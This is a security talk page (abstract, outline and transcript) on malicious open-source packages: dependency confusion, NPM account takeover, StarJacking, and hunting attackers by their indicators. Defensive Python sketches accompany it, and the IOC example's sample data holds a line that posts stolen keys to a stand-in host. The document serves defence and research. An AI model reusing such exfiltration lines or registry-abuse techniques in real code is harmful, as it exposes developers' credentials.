Abstract
Presentation Outline
1. Refresher on recent OSS attacks, establishing:
- A quick baseline of terminology and concepts, plus a focus on recent major attacks (PHP, dependency confusion, etc.)
2. Lack of visibility
The Python Package Index (PyPI) deals with malicious packages by simply removing them, without publishing their code or metadata to a central location where they could be found and researched.
Similarly, NPM removes all code and metadata and places a generic “security holding package” label on the package web page, although it does publish a security advisory with varying levels of specificity.
Researchers are unable to learn from detected malicious packages. No IOC/contributor data = no hunting for more malicious code packages.
3. Lack of validation
One example: when publishing a Python package to PyPI, the publisher can link a GitHub repository to the package. PyPI then pulls the repository statistics straight from GitHub and presents them on the package web page. The problem is that the connection between the package and the repository is never validated.
We will demonstrate this technique, which we came to call StarJacking.
4. Lack of awareness
The entire ecosystem is focused on detecting known vulnerabilities, and many security teams believe this risk is covered by SCA products.
This is not the case: vulnerabilities ≠ malware.
We need a mindset shift and a new technology stack to detect attackers in code packages.
Reactive vs. proactive, static signatures vs. dynamic execution
5. Looking ahead
Most of what we do today in the field of malicious open-source software can best be described as patch management. The “cyber” point of view has yet to enter this game.
In this spirit, some thoughts on where we should be heading:
• Malware zoo -> code package hatchery
• Sandbox for files -> detonation chambers for dynamic analysis of code
• Cross language detection
• TTPs
• Bonus – contributors’ reputation
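To illustrate the missing validation behind StarJacking (outline item on lack of validation), here is a minimal sketch of the kind of check a registry could run: does the linked repository actually declare a package with the same name? The function names and the idea of passing in the names found in the repository are assumptions for illustration, not a description of any registry's real behavior.

```python
import re


def normalize(name: str) -> str:
    """Normalize a package name the way PEP 503 describes (case and separators)."""
    return re.sub(r"[-_.]+", "-", name).lower()


def repo_link_is_plausible(package_name: str, names_declared_in_repo: list[str]) -> bool:
    """Return True if the linked repository declares a package with the same name.

    `names_declared_in_repo` is hypothetical input: the package names found in the
    repository's own build files (for example setup.py or pyproject.toml).
    """
    wanted = normalize(package_name)
    return any(normalize(n) == wanted for n in names_declared_in_repo)


if __name__ == "__main__":
    # A package pointing at its real repository passes the check.
    print(repo_link_is_plausible("My_Package", ["my-package"]))
    # A package borrowing the stars of an unrelated popular repository does not.
    print(repo_link_is_plausible("totally-legit", ["requests"]))
```

A check like this only shows that the link is unverified; it cannot prove that a package is malicious.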
Transcript
This transcript was autogenerated. To make changes, submit a PR.
Hi guys, and welcome to my lecture,
Why Attackers in Code Packages Are Getting a Pass.
First, let me introduce myself. My name is Sahi.
I am the head of software supply chain at Checkmarx.
I have many years of experience in cyber. I used to
work at McAfee, Symantec, Palo Alto and most recently
at Checkmarx. My specialty is building
advanced malware research systems. So today I want
to talk about open source. Everybody is using
open source. It helps develop products faster,
and anybody can contribute code to an open source project,
which is a big part of why this ecosystem is so
successful. Coming from a cyber background, I ask
myself, do attackers contribute code as
well? Well, the short answer is yes.
Let us see. We have studied this attack surface
for a really long time, all the recent attacks, and we would be happy to
share with you what we have learned about open source, which of course
is part of the supply chain. And supply chain attacks are on
the rise. Let's take a couple of examples so
we will be clear about what we are talking about. The first example I
want to give is dependency confusion.
Dependency confusion is an attack technique that was
discovered last year. It was used to hack into companies like Microsoft,
Apple and Netflix by an ethical hacker.
It's a new type of open source supply chain attack, and in
many cases this is not a bug, this is a feature. What usually
happens with dependency confusion is that when
a developer is using packages, they will use a
combination of internal packages, in this example
my-company-utils, and external packages like
React, and the artifact server will fetch
the relevant package. But as we can
see, there is by default no clear indication of private
or public. So what can happen in
this confusion, which is common, is an attacker
can guess, just guess, the name of an internal package
and register it on NPM or Python or
other languages. And because
anybody can register a package, if he was able
to guess the internal name and if this is the default configuration,
what will happen, as you can see, is he will
be able to get his package inside the developer's
workstation. So if both
names are the same, why would the artifact server
choose to take the attacker's one? As you can see, a lot
of the time a developer will say to take the latest version,
and an attacker can just give himself a very high
version number for this attack to succeed. This is
not a hypothetical attack. We are seeing these kinds of attacks
weekly. Just a couple of weeks ago we
were able to track down and remove packages that were
uploaded by an attacker called never summer 68.
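The mechanism described above, a public package sharing an internal name and winning because of a higher version number, can be sketched as a small offline check. This is only an illustration under stated assumptions: the function names, the package names and the plain dotted-integer version format are hypothetical, and the "registry" is a dictionary rather than a real NPM or PyPI query.

```python
from __future__ import annotations


def parse_version(version: str) -> tuple[int, ...]:
    """Turn '1.4.2' into (1, 4, 2) so versions compare numerically, not as text."""
    return tuple(int(part) for part in version.split("."))


def find_collisions(internal: dict[str, str], public: dict[str, str]) -> list[tuple[str, str, bool]]:
    """List internal package names that also exist publicly.

    Each finding is (name, public_version, public_wins), where public_wins is True
    when a 'take the latest version' policy would pick the public package.
    """
    findings = []
    for name in sorted(internal):
        if name in public:
            public_wins = parse_version(public[name]) > parse_version(internal[name])
            findings.append((name, public[name], public_wins))
    return findings


if __name__ == "__main__":
    # Hypothetical data: one internal name has been registered publicly
    # with an unusually high version number.
    internal_packages = {"my-company-utils": "1.4.2", "my-company-auth": "2.0.0"}
    public_registry = {"my-company-utils": "99.10.9", "react": "18.2.0"}
    for finding in find_collisions(internal_packages, public_registry):
        print(finding)
```

Any collision is worth investigating, even when the public version is lower, since the attacker can publish a higher one at any time.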
When you look at the package, you can first see
the version number, which is not a typical version number.
This is usually some kind of indication that this can be a
dependency confusion. And if you look at the names,
you can actually figure out which organization he was trying
to target. If a developer was using
one of these packages, what was stored inside the
package is code that will automatically steal the SSH
keys of the developer and send them to an
attacker-controlled website. So this attack is still ongoing,
and we really believe in giving back to the community. So we have
released an open source tool called Dustilock that helps monitor
this kind of configuration and alerts you not to use those
internal package names. Check it out. Another attack
that we saw a couple of months ago, with a
very high impact, was where two really popular
NPM packages were compromised. An attacker
actually uploaded malicious packages which affected tens of
thousands of organizations worldwide. The first
package was UA parser, and as you can see
marked in red, those are the malicious parts.
So he added the first part, which actually downloads
a password stealer, and then the second part, which actually downloads a
crypto miner. It was discovered,
they were removed and an official advisory was sent
out by CISA. Two weeks later, the same attacker
did the same thing, this time compromising packages called coa
and rc. And as you can see they are quite popular.
In this instance he made a bug, making his
attack unsuccessful, while still crippling a lot of build
servers all around the world. We monitor those things constantly
and as we can see those attacks are
not isolated. We were actually able to find a prior
attack regarding UA parser, and we track
this attacker as UNC 3379
inside the industry. We don't think this will be his
last attack. And of course those are not just attacks around
NPM, those can happen in every open source language
out there. So as we said, we were
able to detect these attackers and alert against them
and write about the bugs he created. But this
wasn't enough. Why is that? If we
study the activity of the attacker, what we call
a TTP, we can see that he is constantly
compromising NPM accounts and doing what we
are calling NPM account takeover. If we
look at that, usually an open source contributor will have one
GitHub account where he stores his code and another account
in NPM, in this example, but it could be Python or
Maven or any other language, that stores the package.
What the attacker is doing is compromising the NPM
account. Why is that important? To learn about the
habits, about the tools, techniques and procedures of an attacker.
So usually what happens is when you store your
code in GitHub, you can then push it into NPM
when you have the right tag. This is a normal activity
and we have seen it many times. This is for example UA parser,
and you can see a correlation between the tag and the
package, until the attack.
The attacker uploaded three new versions into NPM,
but he wasn't able to compromise the GitHub account. So we never saw
their code inside GitHub. This of course can be a
reason to suspect. And the
reason they uploaded three different versions is to make sure that
whatever update policy you are using, you will actually use one
of those versions. So the problem for us
is, even if we were able as a community to detect
and to alert, when you are talking about packages with
millions of weekly downloads, in the amount of time it
takes us to monitor, alert and take them down,
there are still a lot of organizations being affected. We wanted
to find an innovative way to stay ahead of the curve. For
that we have released for the community what we call
ChainAlert. ChainAlert is an early warning system
offered free to everyone in the open source community.
Basically what we are doing is we're monitoring new releases,
and whenever we find a new release that has no corresponding
code or activity in GitHub, we alert the
maintainer. Hey, we just saw a new package being released,
but we never saw the code in GitHub. Is that okay or not?
We are not saying those are malicious, but we are alerting
and monitoring for suspicious activity.
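The check described here, a registry release with no matching code in the source repository, can be sketched as a comparison of published versions against repository tags. This is a minimal illustration and not ChainAlert's actual implementation; the function name, the version lists and the convention that tags may carry a `v` prefix are all assumptions.

```python
def releases_without_tag(registry_versions: list[str], git_tags: list[str]) -> list[str]:
    """Return registry versions that have no corresponding tag in the repository.

    Tags such as 'v1.2.0' and '1.2.0' are treated as the same version.
    """
    tagged = {tag[1:] if tag.startswith("v") else tag for tag in git_tags}
    return [version for version in registry_versions if version not in tagged]


if __name__ == "__main__":
    # Hypothetical package: three versions on the registry, one tag in the repository.
    published = ["1.2.0", "1.2.1", "1.3.0"]
    tags = ["v1.2.0"]
    for version in releases_without_tag(published, tags):
        # An untagged release is suspicious, not proof of compromise,
        # so the natural next step is to ask the maintainer.
        print(f"Release {version} has no matching tag; ask the maintainer to confirm it.")
```

Some maintainers legitimately publish without tagging, which is why the result is treated as a prompt to ask rather than a verdict.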
So if we find these kinds of examples
and the attacker strikes again, we have a way
to quickly identify and maybe avoid those suspicious packages.
This is right now what we are doing. We are opening
an issue for the original package's maintainer, and also
everybody that is subscribed to the project and is using
one of those packages will get an issue automatically. So we
created this to raise developer awareness and
analyze account takeovers. And again, as I said, it's a free service for
the open source projects and the open source community.
Feel free to join us or add some feature requests.
We'll be happy to get your feedback, guys. So this is,
of course, ChainAlert on GitHub. So why
are these attacks so hard to detect? Most of what
we are doing today is more of a reactive approach,
meaning we wait for somebody else
to flag those attacks and then we react to them.
So we are not doing a proactive approach, we are not hunting,
we are not automatically analyzing everything that's being uploaded.
The problem with being reactive, waiting for somebody else to report
it, is that it could lead to a long mean time to detection,
meaning we can be under attack for a really long time until somebody
else notices, and only then will we be able to repair that.
Another thing is most of the industry still relies
on static signatures. This could be
a bit problematic when you're trying to stop an attacker because
as we've learned in the cyber industry, static signatures are quite
easy for an attacker to bypass. So let me give
you an example of what I mean. Reactive versus proactive.
I'm going to talk about hunting. We've been doing hunting for many years
in cyber. Now how can we hunt in open source?
So our story begins with a really
cool project I really like called Backstabber's Knife Collection,
which is a couple of people just maintaining a list of malicious
packages that were removed into a central repository where researchers
can actually take a look at them. So we
are always looking for malicious packages. And for this
example we'll start with a malicious package actually uploaded
into Backstabber's. So this package was
actually flagged as malicious a couple of years ago.
And we can see the basic code and what it
was doing. But do we think this is a
one-time incident, or is there an attacker behind
it? And if so, what can we learn about this attacker?
So every time we come across a malicious package, we don't
just remove it or flag it.
We are being proactive. We are hunting for it. What do I
mean? So I'll show you a couple of our methodologies.
So when we go hunting, we are looking at the metadata.
What do we know about this account, this description, this repository,
this home page, this owner? What do we know about the
IOCs, the indicators of compromise inside this package:
the URL, the domain, the IP, the cryptocurrency?
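As a rough illustration of hunting on indicators like these, the sketch below pulls URLs, domains and IPv4 addresses out of package source text and reports what two packages have in common, regardless of language. The regular expressions are deliberately simple and the function names and sample snippets are hypothetical; this is not the system described in the talk.

```python
from __future__ import annotations

import re
from urllib.parse import urlparse

# Simple patterns for illustration; real-world extraction needs more care.
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_iocs(source: str) -> set[str]:
    """Collect URLs, their host names, and IPv4 addresses found in source text."""
    urls = set(URL_RE.findall(source))
    hosts = {urlparse(url).hostname for url in urls}
    hosts.discard(None)  # urlparse returns None when no host could be parsed
    ips = set(IPV4_RE.findall(source))
    return urls | hosts | ips


def shared_iocs(known_bad_source: str, candidate_source: str) -> set[str]:
    """Indicators that appear both in a known malicious package and in a candidate."""
    return extract_iocs(known_bad_source) & extract_iocs(candidate_source)


if __name__ == "__main__":
    # Hypothetical snippets: a removed Python package and a live JavaScript package.
    removed_python = 'requests.post("http://evil.example/collect", data=keys)'
    live_javascript = "https.get('http://evil.example/collect?x=1')"
    print(shared_iocs(removed_python, live_javascript))
```

Matching on the domain rather than the full URL is what lets the two snippets connect even though the attacker changed the request path between packages.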
And then, using our system, we automatically create
a unique set of characteristics, and then we start looking for suspicious
packages in other languages also, and
looking at those packages, although we started in
Python, based on the unique characteristics
that I've shown you, we were actually able to find live packages
a couple of years after the first package was
removed. So those packages were
actually still active, and we reported them to Python, to
NPM, to Ruby, and we had them removed. This is not
something unique. We need to understand this is not a vulnerability,
this is not a bug that we just remove. Those are attackers.
And we need to change our mindset about how we approach
attackers and how we track them, how we hunt them down.
We have done this mind shift in cyber with IR.
We need to embrace this same mind shift in open source in order
to keep our ecosystem clean. So for me
this talk is actually a call for action as a
researcher who wants to keep the open source community clean.
We need to have some kind of a central repository of malicious packages.
I really like Backstabber's,
but I think that we need more commitment from
the major players in the field for a central repository
of malicious packages and their full metadata so
researchers like me and others can hunt for OSS
hackers and keep our ecosystem clean. Thank you
guys. I hope you found it interesting and I hope
we shed some light on recent open source attacks and attackers and
the mindset we believe we need in order to
not give them a pass, track them, find them,
and keep the ecosystem clean. Thank you guys and
have a great day.